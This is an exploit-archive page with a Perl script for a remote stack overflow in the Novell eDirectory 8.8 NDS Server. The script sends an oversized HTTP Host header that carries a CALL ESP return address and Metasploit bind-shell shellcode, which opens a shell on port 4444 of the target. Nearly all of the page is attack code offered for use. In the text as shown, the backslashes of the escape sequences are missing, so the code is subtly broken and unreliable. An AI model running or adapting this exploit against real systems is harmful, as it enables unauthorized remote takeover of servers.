[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit
# Published : 2006-10-28
# Author : FistFuXXer
# Previous Title : PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32)
# Next Title : Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow
#!perl
#
# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
#
# Author: Manuel Santamarina Suarez
# e-Mail: FistFuXXer@gmx.de
#
use IO::Socket;
#
# destination IP address
#
$ip = '192.168.1.25';
#
# destination TCP port
#
$port = 8028;
#
# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free
#
$ret = reverse( "x5Fx83x3Bx7A" ); # CALL ESP
# MFC42U.5f833b7a
#
# 0x00, 0x0a, 0x0d, 0x3a free shellcode
#
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38".
"x4ex56x46x42x46x32x4bx58x45x44x4ex43x4bx48x4ex57".
"x45x30x4ax37x41x50x4fx4ex4bx38x4fx44x4ax51x4bx48".
"x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x43x4bx38".
"x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x42x4ax42x45x57x45x4ex4bx48".
"x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex50x4bx54".
"x4bx58x4fx45x4ex31x41x50x4bx4ex43x50x4ex52x4bx38".
"x49x38x4ex46x46x42x4ex41x41x46x43x4cx41x53x4bx4d".
"x46x36x4bx58x43x44x42x33x4bx48x42x44x4ex50x4bx58".
"x42x47x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax36".
"x50x38x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x46".
"x43x35x48x56x4ax56x43x33x44x53x4ax46x47x57x43x47".
"x44x53x4fx55x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e".
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx35x49x38x45x4e".
"x48x56x41x48x4dx4ex4ax50x44x50x45x35x4cx46x44x30".
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x45".
"x4fx4fx48x4dx43x35x43x35x43x35x43x35x43x35x43x54".
"x43x45x43x34x43x55x4fx4fx42x4dx48x46x4ax46x41x31".
"x4ex45x48x36x43x45x49x58x41x4ex45x39x4ax36x46x4a".
"x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41".
"x41x55x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x42".
"x49x4ex47x55x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d".
"x4ax46x45x4ex49x34x48x38x49x54x47x35x4fx4fx48x4d".
"x42x55x46x55x46x45x45x45x4fx4fx42x4dx43x59x4ax36".
"x47x4ex49x37x48x4cx49x57x47x55x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x36x4cx36x46x56x48x46x4ax56x43x36".
"x4dx46x49x38x45x4ex4cx56x42x45x49x35x49x32x4ex4c".
"x49x58x47x4ex4cx56x46x44x49x48x44x4ex41x53x42x4c".
"x43x4fx4cx4ax50x4fx44x34x4dx52x50x4fx44x54x4ex52".
"x43x59x4dx48x4cx37x4ax53x4bx4ax4bx4ax4bx4ax4ax36".
"x44x47x50x4fx43x4bx48x51x4fx4fx45x57x46x44x4fx4f".
"x48x4dx4bx55x47x55x44x35x41x55x41x35x41x55x4cx46".
"x41x50x41x45x41x55x45x45x41x35x4fx4fx42x4dx4ax46".
"x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx56".
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx38x47x45x4ex4f".
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d".
"x4ax36x50x57x4ax4dx44x4ex43x37x43x45x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."nn";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.n";
print "[+] Trying to overwrite RETurn address...n";
$sock->send( "GET /nds HTTP/1.1rn" );
$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "rnrn" );
print "[+] Done. Now check for bind shell on $ip:4444!";
close( $sock );
# www.Syue.com [2006-10-28]